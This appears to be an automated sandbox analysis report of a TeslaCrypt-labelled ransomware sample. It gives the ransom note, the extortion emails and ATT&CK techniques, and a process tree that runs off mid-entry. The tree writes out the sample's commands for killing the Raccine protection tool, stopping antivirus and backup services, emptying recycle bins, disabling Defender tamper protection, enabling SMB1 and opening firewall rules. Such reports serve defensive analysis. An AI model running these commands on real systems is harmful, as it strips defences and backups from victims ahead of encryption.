teslacrypt | f42f289579c0ea0fb6e03342144718ac553d8f157155bd854084719291be84e8

Analysis

max time kernel
81s
max time network
73s
platform
windows7_x64
resource
win7v20201028
submitted
04-02-2021 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbc[1].exe

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: workplus111@protonmail.com Reserve e-mail address to contact us: worker400@airmail.cc Key Identifier: e6T+KEs17/kRgMH/kQhnlx8WNKXYY2gMkcuTkUPyeuQSo9kkn6XQNYwIhK+gn2v9L4bXpg9x5KkZfo3z6E2ZBTKJKZBCzYCZn8+HBraX1txaeHOnQU4t8XPD4X04kAtC5/h/yIAhoNSDLj2PEE0A17DLoEQ06HQyDgfRCoNyhbXvOyHRL95fDEBzIFGpvqXGwtYV9U5RTr6E/8ryes0m0Bfv7U5AuDLS9HUzRxsMts9aeXC+2e6HgOnx5ljujwUSpkO5IbHmC4avfNIPomLjwLRSbnUFfaybWRAltLswZZ0BJR63jSp8b4/Ds/mp0728Ij4OoAvqC7VzEyp/YmTwMmCJvz/aYRcwdHRjSzh0GxxK2B+MFQvDArhbTmjKEJ8Hpm2L81SlIQpyn3zSzv28W18b7o++/VDrRyjkVAK6+qMBrqO2nfXoKM7XDkNrUT5U2JHDQ1vKtGOK4GxpDY5u3zyUC6mbhsWNp77QGr77M51pE0BSoYGvS6wGRUwdTUEN8XoZr0X2s2df0pAY3ka7niAXloEwL27BS1Z52h0NuQacgsOBzctM7nq9bqJ8LFMfqUgBFgQT4pm2zpvasRAMmt08FAoAbtBVaBZKVy6pH3HbDZV8aoOF2qdbN1ZfxvEpI7NngTDG5687WOnsvDiVGJulsQmRuyNoNbO+/sn8vq8=

Emails

workplus111@protonmail.com

worker400@airmail.cc

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

workplus111@protonmail.com

worker400@airmail.cc

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Executes dropped EXE 1 IoCs

Processes:

tm94ra6g.exe

pid process

1488 tm94ra6g.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

tm94ra6g.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk tm94ra6g.exe
Loads dropped DLL 1 IoCs

Processes:

bbc[1].exe

pid process

1932 bbc[1].exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

528 icacls.exe
2752 icacls.exe
3336 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	tm94ra6g.exe

pid	process
1932	bbc[1].exe

pid	process
528	icacls.exe
2752	icacls.exe
3336	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

tm94ra6g.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	tm94ra6g.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

2556 net.exe

pid	process
2556	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3908	taskkill.exe
4032	taskkill.exe
4060	taskkill.exe
3640	taskkill.exe
3616	taskkill.exe
3600	taskkill.exe
3820	taskkill.exe
3844	taskkill.exe
2764	taskkill.exe
3248	taskkill.exe
3296	taskkill.exe
3552	taskkill.exe
3648	taskkill.exe
3804	taskkill.exe
2236	taskkill.exe
4008	taskkill.exe
4072	taskkill.exe
2472	taskkill.exe
3524	taskkill.exe
3608	taskkill.exe
3576	taskkill.exe
3796	taskkill.exe
3892	taskkill.exe
3828	taskkill.exe
3932	taskkill.exe
2788	taskkill.exe
2004	taskkill.exe
3532	taskkill.exe
3560	taskkill.exe
3728	taskkill.exe
3788	taskkill.exe
3508	taskkill.exe
3624	taskkill.exe
3736	taskkill.exe
3592	taskkill.exe
3768	taskkill.exe
3916	taskkill.exe
3956	taskkill.exe
3968	taskkill.exe
3584	taskkill.exe
3720	taskkill.exe
3780	taskkill.exe
3836	taskkill.exe
3516	taskkill.exe
3760	taskkill.exe
3868	taskkill.exe
4024	taskkill.exe
4048	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1988 reg.exe
Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

NOTEPAD.EXEnotepad.exe

pid process

3860 NOTEPAD.EXE
2496 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2820 PING.EXE

pid	process
1988	reg.exe

pid	process
3860	NOTEPAD.EXE
2496	notepad.exe

pid	process
2820	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

tm94ra6g.exe

pid	process
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

tm94ra6g.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1488	tm94ra6g.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	3616	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	3600	taskkill.exe
Token: SeDebugPrivilege	3608	taskkill.exe
Token: SeDebugPrivilege	3624	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	3592	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	3780	taskkill.exe
Token: SeDebugPrivilege	3804	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	3760	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	3248	taskkill.exe
Token: SeDebugPrivilege	4032	taskkill.exe
Token: SeDebugPrivilege	4072	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	3296	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	3828	taskkill.exe
Token: SeDebugPrivilege	3844	taskkill.exe
Token: SeDebugPrivilege	3836	taskkill.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3932	taskkill.exe
Token: SeDebugPrivilege	4008	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	3908	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	4048	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

tm94ra6g.exe

pid process

1488 tm94ra6g.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

tm94ra6g.exe

pid process

1488 tm94ra6g.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bbc[1].exetm94ra6g.exe

description	pid	process	target process
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	tm94ra6g.exe
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	tm94ra6g.exe
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	tm94ra6g.exe
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	tm94ra6g.exe
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	powershell.exe
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	powershell.exe
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	powershell.exe
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	powershell.exe
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	taskkill.exe
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	taskkill.exe
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	taskkill.exe
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	taskkill.exe
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	reg.exe
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	schtasks.exe
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	schtasks.exe
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	schtasks.exe
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	schtasks.exe
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	cmd.exe
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	sc.exe
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	netsh.exe
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	netsh.exe
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	netsh.exe
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	netsh.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

tm94ra6g.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	tm94ra6g.exe

C:\Users\Admin\AppData\Local\Temp\bbc[1].exe
"C:\Users\Admin\AppData\Local\Temp\bbc[1].exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932

C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
"C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
3⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
3⤵
- Modifies registry key
PID:1988

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
3⤵
PID:952

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
3⤵
PID:692

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
PID:368

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
3⤵
PID:1564

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
3⤵
PID:332

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
3⤵
PID:1532

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
PID:1096

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
3⤵
PID:336

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
PID:624

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3⤵
PID:1604

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
PID:1696

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
3⤵
PID:1480

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
3⤵
PID:1852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
4⤵
PID:1508

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
3⤵
PID:820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
4⤵
PID:2028

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
3⤵
PID:556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
4⤵
PID:1064

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
3⤵
PID:1492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:872

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
3⤵
PID:564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
4⤵
PID:1256

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
3⤵
PID:1760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
4⤵
PID:272

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
3⤵
PID:1468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
4⤵
PID:1600

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
3⤵
PID:1080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
4⤵
PID:1572

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
3⤵
PID:440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1664

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
3⤵
PID:1124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:2080

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
3⤵
PID:888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
4⤵
PID:2132

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
3⤵
PID:1256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
4⤵
PID:2196

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
3⤵
PID:576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
4⤵
PID:2088

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
3⤵
PID:1036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:2124

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
3⤵
PID:2064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:2288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
3⤵
PID:2244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
4⤵
PID:2324

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
3⤵
PID:2264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
4⤵
PID:2512

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
3⤵
PID:2308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
4⤵
PID:2424

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
3⤵
PID:2340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
4⤵
PID:2472

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
3⤵
PID:2384

C:\Windows\SysWOW64\net.exe
net view
4⤵
- Discovers systems in the same network
PID:2556

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
3⤵
PID:2416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
4⤵
PID:2568

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
3⤵
PID:2448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
4⤵
PID:2820

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
3⤵
PID:2500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
4⤵
PID:2856

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
3⤵
PID:2544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
4⤵
PID:2832

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:2592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:2888

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
3⤵
PID:2616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
4⤵
PID:2996

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
3⤵
PID:2624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
4⤵
PID:2896

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
3⤵
PID:2644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
4⤵
PID:2940

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
3⤵
PID:2600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
4⤵
PID:2908

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
3⤵
PID:2660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
4⤵
PID:1100

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
4⤵
PID:2100

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
3⤵
PID:2864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
4⤵
PID:2092

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
3⤵
PID:2784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
4⤵
PID:776

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
3⤵
PID:2776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
4⤵
PID:2104

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:2768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
4⤵
PID:1572

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:872

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
3⤵
PID:2752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
4⤵
PID:1536

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:2744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
4⤵
PID:1500

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
3⤵
PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
4⤵
PID:2148

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
3⤵
PID:2724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
4⤵
PID:2052

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:2716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:1160

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:2708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:2924

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
3⤵
PID:3056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
4⤵
PID:1532

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
3⤵
PID:332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
4⤵
PID:2140

C:\Windows\SysWOW64\net.exe
